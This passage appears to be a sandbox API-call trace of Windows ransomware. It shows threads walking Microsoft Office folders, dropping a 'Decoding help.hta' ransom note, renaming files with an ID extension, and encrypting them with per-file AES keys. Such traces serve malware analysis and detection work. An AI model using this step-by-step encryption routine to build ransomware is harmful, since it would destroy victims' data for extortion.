Files\\Microsoft Office\\Stationery\\1033\\CURRENCY.GIF.[ID]g9uZrLhJaygpwRm1[ID]" (normalized: "c:\\program files\\microsoft office\\stationery\\1033\\currency.gif.[id]g9uzrlhjaygpwrm1[id]"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x198 [0058.151] CreateFileMappingA (hFile=0x198, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x0, lpName=0x0) returned 0x6d8 [0058.152] CryptAcquireContextA (in: phProv=0x1e75fcec, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x1e75fcec*=0x3449c60) returned 1 [0060.179] CryptGenKey (in: hProv=0x3449c60, Algid=0x6610, dwFlags=0x1, phKey=0x1e75fce8 | out: phKey=0x1e75fce8*=0x5d8490) returned 1 [0060.179] CryptExportKey (in: hKey=0x5d8490, hExpKey=0x0, dwBlobType=0x8, dwFlags=0x0, pbData=0x1e75fbe4, pdwDataLen=0x1e75fce4 | out: pbData=0x1e75fbe4*, pdwDataLen=0x1e75fce4*=0x2c) returned 1 [0060.179] MapViewOfFile (hFileMappingObject=0x6d8, dwDesiredAccess=0x2, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x1760) returned 0x39f0000 [0062.553] CryptEncrypt (in: hKey=0x5a5130, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x1e75fbe4*, pdwDataLen=0x1e75fcf8*=0x40, dwBufLen=0x100 | out: pbData=0x1e75fbe4*, pdwDataLen=0x1e75fcf8*=0x100) returned 1 [0062.556] CryptEncrypt (in: hKey=0x5d8490, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x39f0000, pdwDataLen=0x1e75fce4*=0x1760, dwBufLen=0x1760 | out: pbData=0x39f0000*, pdwDataLen=0x1e75fce4*=0x1760) returned 1 [0062.563] UnmapViewOfFile (lpBaseAddress=0x39f0000) returned 1 [0062.565] CloseHandle (hObject=0x6d8) returned 1 [0062.566] CryptDestroyKey (hKey=0x5d8490) returned 1 [0062.566] CryptReleaseContext (hProv=0x3449c60, dwFlags=0x0) returned 1 [0062.566] SetFilePointerEx (in: hFile=0x198, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0062.566] WriteFile (in: hFile=0x198, lpBuffer=0x1e75fbe4*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x1e75fcf8, lpOverlapped=0x0 | out: lpBuffer=0x1e75fbe4*, lpNumberOfBytesWritten=0x1e75fcf8*=0x100, lpOverlapped=0x0) returned 1 [0062.567] WriteFile (in: hFile=0x198, lpBuffer=0x4040f0*, nNumberOfBytesToWrite=0x500, lpNumberOfBytesWritten=0x1e75fcf8, lpOverlapped=0x0 | out: lpBuffer=0x4040f0*, lpNumberOfBytesWritten=0x1e75fcf8*=0x500, lpOverlapped=0x0) returned 1 [0062.567] CloseHandle (hObject=0x198) returned 1 [0062.567] SetFileAttributesW (lpFileName="\\\\?\\C:\\Program Files\\Microsoft Office\\Stationery\\1033\\CURRENCY.GIF.[ID]g9uZrLhJaygpwRm1[ID]", dwFileAttributes=0x1) returned 1 [0062.567] FindNextFileW (in: hFindFile=0x5e3230, lpFindFileData=0x1e75fd30 | out: lpFindFileData=0x1e75fd30*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xf7886800, ftCreationTime.dwHighDateTime=0x1c05f78, ftLastAccessTime.dwLowDateTime=0xebb910, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0xf7886800, ftLastWriteTime.dwHighDateTime=0x1c05f78, nFileSizeHigh=0x0, nFileSizeLow=0x224, dwReserved0=0x0, dwReserved1=0x0, cFileName="CURRENCY.HTM", cAlternateFileName="")) returned 1 Thread: id = 462 os_tid = 0x518 [0045.314] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\*.*", lpFindFileData=0x1e89fd30 | out: lpFindFileData=0x1e89fd30*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x512f1610, ftCreationTime.dwHighDateTime=0x1d301bf, ftLastAccessTime.dwLowDateTime=0x7090d6b0, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x7090d6b0, ftLastWriteTime.dwHighDateTime=0x1d301bf, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x5e35f0 [0045.557] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0045.557] FindNextFileW (in: hFindFile=0x5e35f0, lpFindFileData=0x1e89fd30 | out: lpFindFileData=0x1e89fd30*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x512f1610, ftCreationTime.dwHighDateTime=0x1d301bf, ftLastAccessTime.dwLowDateTime=0x7090d6b0, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x7090d6b0, ftLastWriteTime.dwHighDateTime=0x1d301bf, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0050.602] lstrcmpW (lpString1=".", lpString2="..") returned -1 [0050.602] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0050.602] FindNextFileW (in: hFindFile=0x5e35f0, lpFindFileData=0x1e89fd30 | out: lpFindFileData=0x1e89fd30*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x54952c00, ftCreationTime.dwHighDateTime=0x1bd4b49, ftLastAccessTime.dwLowDateTime=0x5eb42550, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x54952c00, ftLastWriteTime.dwHighDateTime=0x1bd4b49, nFileSizeHigh=0x0, nFileSizeLow=0x2340, dwReserved0=0x0, dwReserved1=0x0, cFileName="AG00004_.GIF", cAlternateFileName="")) returned 1 [0050.602] lstrcpyW (in: lpString1=0x252bff10, lpString2="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\*.*" | out: lpString1="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\*.*") returned="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\*.*" [0050.602] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\*.*") returned 58 [0050.602] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\", lpString2="Decoding help.hta" | out: lpString1="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\Decoding help.hta") returned="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\Decoding help.hta" [0050.602] GetFileAttributesW (lpFileName="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\Decoding help.hta" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\decoding help.hta")) returned 0xffffffff [0051.590] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\Decoding help.hta" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\decoding help.hta"), dwDesiredAccess=0x40000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x62c [0052.156] WriteFile (in: hFile=0x62c, lpBuffer=0x403006*, nNumberOfBytesToWrite=0x78e, lpNumberOfBytesWritten=0x1e89fcf8, lpOverlapped=0x0 | out: lpBuffer=0x403006*, lpNumberOfBytesWritten=0x1e89fcf8*=0x78e, lpOverlapped=0x0) returned 1 [0053.977] CloseHandle (hObject=0x62c) returned 1 [0055.310] SetFileAttributesW (lpFileName="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\Decoding help.hta", dwFileAttributes=0x1) returned 1 [0058.081] lstrcmpiW (lpString1="Decoding help.hta", lpString2="AG00004_.GIF") returned 1 [0058.081] lstrlenW (lpString="AG00004_.GIF") returned 12 [0058.081] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\*.*" | out: lpString1="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\*.*") returned="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\*.*" [0058.081] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\*.*") returned 58 [0058.081] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\", lpString2="AG00004_.GIF" | out: lpString1="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AG00004_.GIF") returned="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AG00004_.GIF" [0058.081] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AG00004_.GIF" | out: lpString1="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AG00004_.GIF") returned="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AG00004_.GIF" [0058.081] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AG00004_.GIF", lpString2=".[ID]g9uZrLhJaygpwRm1[ID]" | out: lpString1="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AG00004_.GIF.[ID]g9uZrLhJaygpwRm1[ID]") returned="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AG00004_.GIF.[ID]g9uZrLhJaygpwRm1[ID]" [0058.081] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AG00004_.GIF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\ag00004_.gif"), lpNewFileName="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AG00004_.GIF.[ID]g9uZrLhJaygpwRm1[ID]" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\ag00004_.gif.[id]g9uzrlhjaygpwrm1[id]")) returned 1 [0061.603] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AG00004_.GIF.[ID]g9uZrLhJaygpwRm1[ID]" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\ag00004_.gif.[id]g9uzrlhjaygpwrm1[id]"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x384 [0061.604] CreateFileMappingA (hFile=0x384, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x0, lpName=0x0) returned 0x310 [0061.604] CryptAcquireContextA (phProv=0x1e89fcec, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000) Thread: id = 463 os_tid = 0x324 [0045.315] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\Publisher\\*.*", lpFindFileData=0x1e9dfd30 | out: lpFindFileData=0x1e9dfd30*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x56406370, ftCreationTime.dwHighDateTime=0x1d301bf, ftLastAccessTime.dwLowDateTime=0x56406370, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x56406370, ftLastWriteTime.dwHighDateTime=0x1d301bf, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x5e32b0 [0045.531] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0045.531] FindNextFileW (in: hFindFile=0x5e32b0, lpFindFileData=0x1e9dfd30 | out: lpFindFileData=0x1e9dfd30*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x56406370, ftCreationTime.dwHighDateTime=0x1d301bf, ftLastAccessTime.dwLowDateTime=0x56406370, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x56406370, ftLastWriteTime.dwHighDateTime=0x1d301bf, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0048.739] lstrcmpW (lpString1=".", lpString2="..") returned -1 [0048.739] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0048.739] FindNextFileW (in: hFindFile=0x5e32b0, lpFindFileData=0x1e9dfd30 | out: lpFindFileData=0x1e9dfd30*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x56406370, ftCreationTime.dwHighDateTime=0x1d301bf, ftLastAccessTime.dwLowDateTime=0x7089b290, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x7089b290, ftLastWriteTime.dwHighDateTime=0x1d301bf, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Backgrounds", cAlternateFileName="BACKGR~1")) returned 1 [0048.739] lstrcmpW (lpString1=".", lpString2="Backgrounds") returned -1 [0048.739] lstrcmpW (lpString1="..", lpString2="Backgrounds") returned -1 [0048.739] lstrcmpiW (lpString1="windows", lpString2="Backgrounds") returned 1 [0048.742] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\Publisher\\*.*" | out: lpString1="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\Publisher\\*.*") returned="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\Publisher\\*.*" [0048.742] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\Publisher\\*.*") returned 59 [0048.742] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\Publisher\\", lpString2="Backgrounds" | out: lpString1="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\Publisher\\Backgrounds") returned="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\Publisher\\Backgrounds" [0048.742] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\Publisher\\Backgrounds", lpString2="\\*.*" | out: lpString1="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\Publisher\\Backgrounds\\*.*") returned="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\Publisher\\Backgrounds\\*.*" [0048.742] GlobalMemoryStatus (in: lpBuffer=0x1e9dfd10 | out: lpBuffer=0x1e9dfd10) [0048.742] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x10000, lpStartAddress=0x4014cc, lpParameter=0x248fdaf0, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x5a4 [0048.746] CloseHandle (hObject=0x5a4) returned 1 [0048.746] FindNextFileW (in: hFindFile=0x5e32b0, lpFindFileData=0x1e9dfd30 | out: lpFindFileData=0x1e9dfd30*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x56406370, ftCreationTime.dwHighDateTime=0x1d301bf, ftLastAccessTime.dwLowDateTime=0x7089b290, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x7089b290, ftLastWriteTime.dwHighDateTime=0x1d301bf, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Backgrounds", cAlternateFileName="BACKGR~1")) returned 0 [0048.746] FindClose (in: hFindFile=0x5e32b0 | out: hFindFile=0x5e32b0) returned 1 Thread: id = 464 os_tid = 0x884 [0045.315] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Program Files\\Microsoft Office\\MEDIA\\CAGCAT10\\*.*", lpFindFileData=0x1eb1fd30 | out: lpFindFileData=0x1eb1fd30*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xeec79e70, ftCreationTime.dwHighDateTime=0x1d301be, ftLastAccessTime.dwLowDateTime=0xbd6dc020, ftLastAccessTime.dwHighDateTime=0x1d305f1, ftLastWriteTime.dwLowDateTime=0xbd6dc020, ftLastWriteTime.dwHighDateTime=0x1d305f1, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x5e32f0 [0045.531] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0045.531] FindNextFileW (in: hFindFile=0x5e32f0, lpFindFileData=0x1eb1fd30 | out: lpFindFileData=0x1eb1fd30*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xeec79e70, ftCreationTime.dwHighDateTime=0x1d301be, ftLastAccessTime.dwLowDateTime=0xbd6dc020, ftLastAccessTime.dwHighDateTime=0x1d305f1, ftLastWriteTime.dwLowDateTime=0xbd6dc020, ftLastWriteTime.dwHighDateTime=0x1d305f1, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0050.568] lstrcmpW (lpString1=".", lpString2="..") returned -1 [0050.568] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0050.568] FindNextFileW (in: hFindFile=0x5e32f0, lpFindFileData=0x1eb1fd30 | out: lpFindFileData=0x1eb1fd30*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xeec79e70, ftCreationTime.dwHighDateTime=0x1d301be, ftLastAccessTime.dwLowDateTime=0xeec79e70, ftLastAccessTime.dwHighDateTime=0x1d301be, ftLastWriteTime.dwLowDateTime=0xeec79e70, ftLastWriteTime.dwHighDateTime=0x1d301be, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="1033", cAlternateFileName="")) returned 1 [0050.568] lstrcmpW (lpString1=".", lpString2="1033") returned -1 [0050.568] lstrcmpW (lpString1="..", lpString2="1033") returned -1 [0050.568] lstrcmpiW (lpString1="windows", lpString2="1033") returned 1 [0050.568] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\Program Files\\Microsoft Office\\MEDIA\\CAGCAT10\\*.*" | out: lpString1="\\\\?\\C:\\Program Files\\Microsoft Office\\MEDIA\\CAGCAT10\\*.*") returned="\\\\?\\C:\\Program Files\\Microsoft Office\\MEDIA\\CAGCAT10\\*.*" [0050.568] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Microsoft Office\\MEDIA\\CAGCAT10\\*.*") returned 56 [0050.568] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files\\Microsoft Office\\MEDIA\\CAGCAT10\\", lpString2="1033" | out: lpString1="\\\\?\\C:\\Program Files\\Microsoft Office\\MEDIA\\CAGCAT10\\1033") returned="\\\\?\\C:\\Program Files\\Microsoft Office\\MEDIA\\CAGCAT10\\1033" [0050.568] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files\\Microsoft Office\\MEDIA\\CAGCAT10\\1033", lpString2="\\*.*" | out: lpString1="\\\\?\\C:\\Program Files\\Microsoft Office\\MEDIA\\CAGCAT10\\1033\\*.*") returned="\\\\?\\C:\\Program Files\\Microsoft Office\\MEDIA\\CAGCAT10\\1033\\*.*" [0050.568] GlobalMemoryStatus (in: lpBuffer=0x1eb1fd10 | out: lpBuffer=0x1eb1fd10) [0050.568] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x10000, lpStartAddress=0x4014cc, lpParameter=0x5d205f8, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x3d4 [0050.729] CloseHandle (hObject=0x3d4) returned 1 [0050.729] FindNextFileW (in: hFindFile=0x5e32f0, lpFindFileData=0x1eb1fd30 | out: lpFindFileData=0x1eb1fd30*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xf2162900, ftCreationTime.dwHighDateTime=0x1ca9120, ftLastAccessTime.dwLowDateTime=0x51b925d0, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0xf2162900, ftLastWriteTime.dwHighDateTime=0x1ca9120, nFileSizeHigh=0x0, nFileSizeLow=0x3da0, dwReserved0=0x0, dwReserved1=0x0, cFileName="CAGCAT10.DLL", cAlternateFileName="")) returned 1 [0050.729] lstrcpyW (in: lpString1=0x10bce4c8, lpString2="\\\\?\\C:\\Program Files\\Microsoft Office\\MEDIA\\CAGCAT10\\*.*" | out: lpString1="\\\\?\\C:\\Program Files\\Microsoft Office\\MEDIA\\CAGCAT10\\*.*") returned="\\\\?\\C:\\Program Files\\Microsoft Office\\MEDIA\\CAGCAT10\\*.*" [0050.729] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Microsoft Office\\MEDIA\\CAGCAT10\\*.*") returned 56 [0050.729] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files\\Microsoft Office\\MEDIA\\CAGCAT10\\", lpString2="Decoding help.hta" | out: lpString1="\\\\?\\C:\\Program Files\\Microsoft Office\\MEDIA\\CAGCAT10\\Decoding help.hta") returned="\\\\?\\C:\\Program Files\\Microsoft Office\\MEDIA\\CAGCAT10\\Decoding help.hta" [0050.729] GetFileAttributesW (lpFileName="\\\\?\\C:\\Program Files\\Microsoft Office\\MEDIA\\CAGCAT10\\Decoding help.hta" (normalized: "c:\\program files\\microsoft office\\media\\cagcat10\\decoding help.hta")) returned 0xffffffff [0050.729] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Microsoft Office\\MEDIA\\CAGCAT10\\Decoding help.hta" (normalized: "c:\\program files\\microsoft office\\media\\cagcat10\\decoding help.hta"), dwDesiredAccess=0x40000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x664 [0052.156] WriteFile (in: hFile=0x664, lpBuffer=0x403006*, nNumberOfBytesToWrite=0x78e, lpNumberOfBytesWritten=0x1eb1fcf8, lpOverlapped=0x0 | out: lpBuffer=0x403006*, lpNumberOfBytesWritten=0x1eb1fcf8*=0x78e, lpOverlapped=0x0) returned 1 [0053.976] CloseHandle (hObject=0x664) returned 1 [0055.310] SetFileAttributesW (lpFileName="\\\\?\\C:\\Program Files\\Microsoft Office\\MEDIA\\CAGCAT10\\Decoding help.hta", dwFileAttributes=0x1) returned 1 [0058.080] lstrcmpiW (lpString1="Decoding help.hta", lpString2="CAGCAT10.DLL") returned 1 [0058.080] lstrlenW (lpString="CAGCAT10.DLL") returned 12 [0058.080] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\Program Files\\Microsoft Office\\MEDIA\\CAGCAT10\\*.*" | out: lpString1="\\\\?\\C:\\Program Files\\Microsoft Office\\MEDIA\\CAGCAT10\\*.*") returned="\\\\?\\C:\\Program Files\\Microsoft Office\\MEDIA\\CAGCAT10\\*.*" [0058.080] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Microsoft Office\\MEDIA\\CAGCAT10\\*.*") returned 56 [0058.080] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files\\Microsoft Office\\MEDIA\\CAGCAT10\\", lpString2="CAGCAT10.DLL" | out: lpString1="\\\\?\\C:\\Program Files\\Microsoft Office\\MEDIA\\CAGCAT10\\CAGCAT10.DLL") returned="\\\\?\\C:\\Program Files\\Microsoft Office\\MEDIA\\CAGCAT10\\CAGCAT10.DLL" [0058.080] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\Program Files\\Microsoft Office\\MEDIA\\CAGCAT10\\CAGCAT10.DLL" | out: lpString1="\\\\?\\C:\\Program Files\\Microsoft Office\\MEDIA\\CAGCAT10\\CAGCAT10.DLL") returned="\\\\?\\C:\\Program Files\\Microsoft Office\\MEDIA\\CAGCAT10\\CAGCAT10.DLL" [0058.080] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files\\Microsoft Office\\MEDIA\\CAGCAT10\\CAGCAT10.DLL", lpString2=".[ID]g9uZrLhJaygpwRm1[ID]" | out: lpString1="\\\\?\\C:\\Program Files\\Microsoft Office\\MEDIA\\CAGCAT10\\CAGCAT10.DLL.[ID]g9uZrLhJaygpwRm1[ID]") returned="\\\\?\\C:\\Program Files\\Microsoft Office\\MEDIA\\CAGCAT10\\CAGCAT10.DLL.[ID]g9uZrLhJaygpwRm1[ID]" [0058.080] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files\\Microsoft Office\\MEDIA\\CAGCAT10\\CAGCAT10.DLL" (normalized: "c:\\program files\\microsoft office\\media\\cagcat10\\cagcat10.dll"), lpNewFileName="\\\\?\\C:\\Program Files\\Microsoft Office\\MEDIA\\CAGCAT10\\CAGCAT10.DLL.[ID]g9uZrLhJaygpwRm1[ID]" (normalized: "c:\\program files\\microsoft office\\media\\cagcat10\\cagcat10.dll.[id]g9uzrlhjaygpwrm1[id]")) returned 1 [0061.603] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Microsoft Office\\MEDIA\\CAGCAT10\\CAGCAT10.DLL.[ID]g9uZrLhJaygpwRm1[ID]" (normalized: "c:\\program files\\microsoft office\\media\\cagcat10\\cagcat10.dll.[id]g9uzrlhjaygpwrm1[id]"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x3ec [0061.603] CreateFileMappingA (hFile=0x3ec, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x0, lpName=0x0) returned 0x360 [0061.603] CryptAcquireContextA (phProv=0x1eb1fcec, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000) Thread: id = 465 os_tid = 0x7c0 [0045.315] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\*.*", lpFindFileData=0x1ec5fd30 | out: lpFindFileData=0x1ec5fd30*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xeef015d0, ftCreationTime.dwHighDateTime=0x1d301be, ftLastAccessTime.dwLowDateTime=0x596c1850, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x596c1850, ftLastWriteTime.dwHighDateTime=0x1d301bf, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x5e3330 [0045.531] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0045.531] FindNextFileW (in: hFindFile=0x5e3330, lpFindFileData=0x1ec5fd30 | out: lpFindFileData=0x1ec5fd30*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xeef015d0, ftCreationTime.dwHighDateTime=0x1d301be, ftLastAccessTime.dwLowDateTime=0x596c1850, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x596c1850, ftLastWriteTime.dwHighDateTime=0x1d301bf, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0048.751] lstrcmpW (lpString1=".", lpString2="..") returned -1 [0048.751] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0048.751] FindNextFileW (in: hFindFile=0x5e3330, lpFindFileData=0x1ec5fd30 | out: lpFindFileData=0x1ec5fd30*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xeef015d0, ftCreationTime.dwHighDateTime=0x1d301be, ftLastAccessTime.dwLowDateTime=0xeef015d0, ftLastAccessTime.dwHighDateTime=0x1d301be, ftLastWriteTime.dwLowDateTime=0xeef015d0, ftLastWriteTime.dwHighDateTime=0x1d301be, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="1033", cAlternateFileName="")) returned 1 [0048.751] lstrcmpW (lpString1=".", lpString2="1033") returned -1 [0048.751] lstrcmpW (lpString1="..", lpString2="1033") returned -1 [0048.751] lstrcmpiW (lpString1="windows", lpString2="1033") returned 1 [0048.751] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\*.*" | out: lpString1="\\\\?\\C:\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\*.*") returned="\\\\?\\C:\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\*.*" [0048.751] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\*.*") returned 56 [0048.751] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\", lpString2="1033" | out: lpString1="\\\\?\\C:\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\1033") returned="\\\\?\\C:\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\1033" [0048.751] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\1033", lpString2="\\*.*" | out: lpString1="\\\\?\\C:\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\1033\\*.*") 